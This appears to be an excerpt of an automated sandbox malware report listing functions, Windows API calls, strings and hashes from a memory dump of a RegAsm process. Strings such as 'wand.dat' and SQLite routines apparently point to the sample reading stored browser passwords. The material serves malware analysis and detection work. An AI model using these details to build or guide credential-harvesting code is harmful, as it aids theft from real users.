                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: ??3@$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                            • String ID:
                            • API String ID: 1973883786-0
                            • Opcode ID: eb77d7cad75ccead34f911285e165139a1ce78e2e313fb24f2a05cc2c8735199
                            • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                            • Opcode Fuzzy Hash: eb77d7cad75ccead34f911285e165139a1ce78e2e313fb24f2a05cc2c8735199
                            • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                            APIs
                            • memset.MSVCRT ref: 004116FF
                              • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                              • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                              • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                              • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                              • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                              • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                              • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                              • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                              • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                              • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4D2
                              • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                              • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4F3
                              • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                            • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                            • API String ID: 2618321458-3614832568
                            • Opcode ID: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                            • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                            • Opcode Fuzzy Hash: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                            • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                            APIs
                            • memset.MSVCRT ref: 004185FC
                            • GetFileAttributesExW.KERNEL32(00000000,00000000,?), ref: 0041860A
                            • ??3@YAXPAX@Z.MSVCRT ref: 00418650
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: ??3@AttributesFilememset
                            • String ID:
                            • API String ID: 776155459-0
                            • Opcode ID: 4b39cef6f19030deb93fe73f67a1ed4f2de523a71059e199493297a9b5600ca9
                            • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                            • Opcode Fuzzy Hash: 4b39cef6f19030deb93fe73f67a1ed4f2de523a71059e199493297a9b5600ca9
                            • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                            APIs
                            • AreFileApisANSI.KERNEL32 ref: 004174FC
                            • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                            • malloc.MSVCRT ref: 00417524
                            • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                            • ??3@YAXPAX@Z.MSVCRT ref: 00417544
                            • ??3@YAXPAX@Z.MSVCRT ref: 00417562
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: ??3@ByteCharMultiWide$ApisFilemalloc
                            • String ID:
                            • API String ID: 2308052813-0
                            • Opcode ID: 57b08e0afea0ce6944352db5cfd1372888f4bdadf73f296c46880c7ddd44ae0d
                            • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                            • Opcode Fuzzy Hash: 57b08e0afea0ce6944352db5cfd1372888f4bdadf73f296c46880c7ddd44ae0d
                            • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                            APIs
                            • GetTempPathW.KERNEL32(000000E6,?), ref: 004181DB
                            • GetTempPathA.KERNEL32(000000E6,?), ref: 00418203
                            • ??3@YAXPAX@Z.MSVCRT ref: 0041822B
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: PathTemp$??3@
                            • String ID: %s\etilqs_$etilqs_
                            • API String ID: 1589464350-1420421710
                            • Opcode ID: 56ec1b67c7de480e9defb5870fd9659a5ac2ef2fb157f5962cb97a1bc3191f52
                            • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                            • Opcode Fuzzy Hash: 56ec1b67c7de480e9defb5870fd9659a5ac2ef2fb157f5962cb97a1bc3191f52
                            • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: ErrorLastMessage_snwprintf
                            • String ID: Error$Error %d: %s
                            • API String ID: 313946961-1552265934
                            • Opcode ID: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                            • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                            • Opcode Fuzzy Hash: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                            • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID:
                            • String ID: foreign key constraint failed$new$oid$old
                            • API String ID: 0-1953309616
                            • Opcode ID: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                            • Instruction ID: 109d2bbf80905f1e2503505ff3b1f335ff26ebd6ff49ac5ca42eb4ed0232da3f
                            • Opcode Fuzzy Hash: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                            • Instruction Fuzzy Hash: 71E19271E00318EFDF14DFA5D882AAEBBB5EF08304F54406EE805AB351DB799A01CB65
                            APIs
                            Strings
                            • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                            • unknown column "%s" in foreign key definition, xrefs: 00431858
                            • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: memcpy
                            • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                            • API String ID: 3510742995-272990098
                            • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                            • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                            • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                            • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: memcpymemset
                            • String ID: gj
                            • API String ID: 1297977491-4203073231
                            • Opcode ID: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                            • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                            • Opcode Fuzzy Hash: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                            • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                            APIs
                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8EC
                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8FA
                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E90B
                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E922
                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E92B
                            • ??3@YAXPAX@Z.MSVCRT ref: 0040E961
                            • ??3@YAXPAX@Z.MSVCRT ref: 0040E974
                            • ??3@YAXPAX@Z.MSVCRT ref: 0040E987
                            • ??3@YAXPAX@Z.MSVCRT ref: 0040E99A
                            • ??3@YAXPAX@Z.MSVCRT ref: 0040E9D3
                              • Part of subcall function 0040AA04: ??3@YAXPAX@Z.MSVCRT ref: 0040AA0B
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: ??3@
                            • String ID:
                            • API String ID: 613200358-0
                            • Opcode ID: 9dde93f155bc57f068176677874d89208783a1ee477747775cc83fd265c4fbdd
                            • Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
                            • Opcode Fuzzy Hash: 9dde93f155bc57f068176677874d89208783a1ee477747775cc83fd265c4fbdd
                            • Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
                            APIs
                            • AreFileApisANSI.KERNEL32 ref: 00417497
                            • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                            • malloc.MSVCRT ref: 004174BD
                            • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                            • ??3@YAXPAX@Z.MSVCRT ref: 004174E4
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: ByteCharMultiWide$??3@ApisFilemalloc
                            • String ID:
                            • API String ID: 2903831945-0
                            • Opcode ID: d5ff2a264155eb9e3ce85c6bda5726e1366a88793ef295ade9d945fa0d444da7
                            • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                            • Opcode Fuzzy Hash: d5ff2a264155eb9e3ce85c6bda5726e1366a88793ef295ade9d945fa0d444da7
                            • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                            APIs
                            • GetParent.USER32(?), ref: 0040D453
                            • GetWindowRect.USER32(?,?), ref: 0040D460
                            • GetClientRect.USER32(00000000,?), ref: 0040D46B
                            • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                            • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: Window$Rect$ClientParentPoints
                            • String ID:
                            • API String ID: 4247780290-0
                            • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                            • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                            • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                            • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                            APIs
                              • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                            • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                            • ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                            • memset.MSVCRT ref: 004450CD
                              • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                            • ??3@YAXPAX@Z.MSVCRT ref: 004450F0
                              • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                              • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F63
                              • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F75
                              • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F9D
                            • CloseHandle.KERNEL32(00000000), ref: 004450F7
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                            • String ID:
                            • API String ID: 1471605966-0
                            • Opcode ID: e6bd7317cd4251b1e8eae304c5381edf11c17e01417ca171e36e0e10a1f16311
                            • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                            • Opcode Fuzzy Hash: e6bd7317cd4251b1e8eae304c5381edf11c17e01417ca171e36e0e10a1f16311
                            • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                            APIs
                            • wcscpy.MSVCRT ref: 0044475F
                            • wcscat.MSVCRT ref: 0044476E
                            • wcscat.MSVCRT ref: 0044477F
                            • wcscat.MSVCRT ref: 0044478E
                              • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                              • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                              • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?), ref: 00409AA5
                              • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                            • String ID: \StringFileInfo\
                            • API String ID: 102104167-2245444037
                            • Opcode ID: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                            • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                            • Opcode Fuzzy Hash: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                            • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                            APIs
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: ??3@
                            • String ID:
                            • API String ID: 613200358-0
                            • Opcode ID: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                            • Instruction ID: 8b058f36177a858601f18eb469b8e3bd7c1df3fc7b9e847ab044313c89d6339d
                            • Opcode Fuzzy Hash: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                            • Instruction Fuzzy Hash: 98F012B25047015FD760AF6AA8C491BF3E9AB597147668C3FF149D3641CB38FC508A1C
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: memcpy$??3@
                            • String ID: g4@
                            • API String ID: 3314356048-2133833424
                            • Opcode ID: d5a05b92b3455112f10c9f31d65c512587a8559eeac8cc3fc14f0db32937a076
                            • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                            • Opcode Fuzzy Hash: d5a05b92b3455112f10c9f31d65c512587a8559eeac8cc3fc14f0db32937a076
                            • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                            APIs
                            • memset.MSVCRT ref: 004100FB
                            • memset.MSVCRT ref: 00410112
                              • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                              • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                            • _snwprintf.MSVCRT ref: 00410141
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: memset$_snwprintf_wcslwrwcscpy
                            • String ID: </%s>
                            • API String ID: 3400436232-259020660
                            • Opcode ID: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                            • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                            • Opcode Fuzzy Hash: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                            • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                            APIs
                            • memset.MSVCRT ref: 0040D58D
                            • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                            • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: ChildEnumTextWindowWindowsmemset
                            • String ID: caption
                            • API String ID: 1523050162-4135340389
                            • Opcode ID: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                            • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                            • Opcode Fuzzy Hash: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                            • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                            APIs
                              • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                              • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                            • CreateFontIndirectW.GDI32(?), ref: 00401156
                            • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                            • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                            • String ID: MS Sans Serif
                            • API String ID: 210187428-168460110
                            • Opcode ID: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                            • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                            • Opcode Fuzzy Hash: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                            • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                            APIs
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: memcpy$memcmp
                            • String ID:
                            • API String ID: 3384217055-0
                            • Opcode ID: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                            • Instruction ID: f5df6941464580ef2fdae31f27b7f31021858bb2d0e37ec30fcb1df3a02010a9
                            • Opcode Fuzzy Hash: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                            • Instruction Fuzzy Hash: 8821B2B2E10249ABDB14EA91DC46EDF73FC9B44704F01442AF512D7181EB28E644C725
                            APIs
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: memset$memcpy
                            • String ID:
                            • API String ID: 368790112-0
                            • Opcode ID: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                            • Instruction ID: abb90bdd0bd5c960a46cc99acd1c91865272cbbdb433919b32c204757dd19146
                            • Opcode Fuzzy Hash: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                            • Instruction Fuzzy Hash: 0201FCB5740B007BF235AB35CC03F9A73A8AF52724F004A1EF153966C2DBF8A554819D
                            APIs
                            • memset.MSVCRT ref: 0040560C
                              • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                              • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                              • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                              • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                              • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                              • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                              • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                              • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                              • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                              • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4D2
                              • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                              • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4F3
                              • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                            • String ID: *.*$dat$wand.dat
                            • API String ID: 2618321458-1828844352
                            • Opcode ID: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                            • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                            • Opcode Fuzzy Hash: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                            • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                            APIs
                            • memset.MSVCRT ref: 00412057
                              • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C
                            • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                            • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                            • GetKeyState.USER32(00000010), ref: 0041210D
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: ExecuteMenuMessageSendShellStateStringmemset
                            • String ID:
                            • API String ID: 3550944819-0
                            • Opcode ID: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                            • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                            • Opcode Fuzzy Hash: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                            • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                            APIs
                            • wcslen.MSVCRT ref: 0040A8E2
                              • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                              • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                              • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                            • ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                            • ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                            • memcpy.MSVCRT ref: 0040A94F
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: ??3@$memcpy$mallocwcslen
                            • String ID:
                            • API String ID: 3023356884-0
                            • Opcode ID: 4562b1f94f0a461de08a7f5e91ae4aaaeb7b7426ec7425c8aec4e78307d57c52
                            • Instruction ID: f32a9ac0308abec2140ef864181b54c8d04bf3279582b466e144db770ea3622c
                            • Opcode Fuzzy Hash: 4562b1f94f0a461de08a7f5e91ae4aaaeb7b7426ec7425c8aec4e78307d57c52
                            • Instruction Fuzzy Hash: 64217CB2200704EFC720DF18D88189AB3F9FF453247118A2EF866AB6A1CB35AD15CB55
                            APIs
                            • wcslen.MSVCRT ref: 0040B1DE
                            • ??3@YAXPAX@Z.MSVCRT ref: 0040B201
                              • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                              • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                              • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                            • ??3@YAXPAX@Z.MSVCRT ref: 0040B224
                            • memcpy.MSVCRT ref: 0040B248
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: ??3@$memcpy$mallocwcslen
                            • String ID:
                            • API String ID: 3023356884-0
                            • Opcode ID: 6ce6fee0dcc9b9c9ebe83d30a233e08065b6d511c8ed6dc8d89b241ff4cd5fb7
                            • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                            • Opcode Fuzzy Hash: 6ce6fee0dcc9b9c9ebe83d30a233e08065b6d511c8ed6dc8d89b241ff4cd5fb7
